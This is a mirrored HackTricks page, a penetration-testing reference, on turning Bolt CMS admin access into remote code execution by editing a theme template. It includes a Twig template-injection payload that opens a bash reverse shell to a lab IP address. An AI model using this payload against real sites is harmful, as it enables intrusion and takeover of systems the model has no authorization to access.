mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	
		
			
				
	
	
	
		
			3.3 KiB
		
	
	
	
	
	
	
	
			
		
		
	
	
			3.3 KiB
		
	
	
	
	
	
	
	
Bolt CMS
{% hint style="success" %}
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:  HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
RCE
After login as admin (go to /bot lo access the login prompt), you can get RCE in Bolt CMS:
- Select Configuration->View Configuration->Main Configurationor go the the URL path/bolt/file-edit/config?file=/bolt/config.yaml- Check the value of theme
 

- Select File management->View & edit templates- Select the theme base found in the previous (base-2021in this case) step and selectindex.twig
- In my case this is in the URL path /bolt/file-edit/themes?file=/base-2021/index.twig
 
- Select the theme base found in the previous (
- Set your payload in this file via template injection (Twig), like: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}- And save changes
 

- Clear the cache in Maintenance->Clear the cache
- Access again the page as a regular user, and the payload should be executed
{% hint style="success" %}
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:  HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.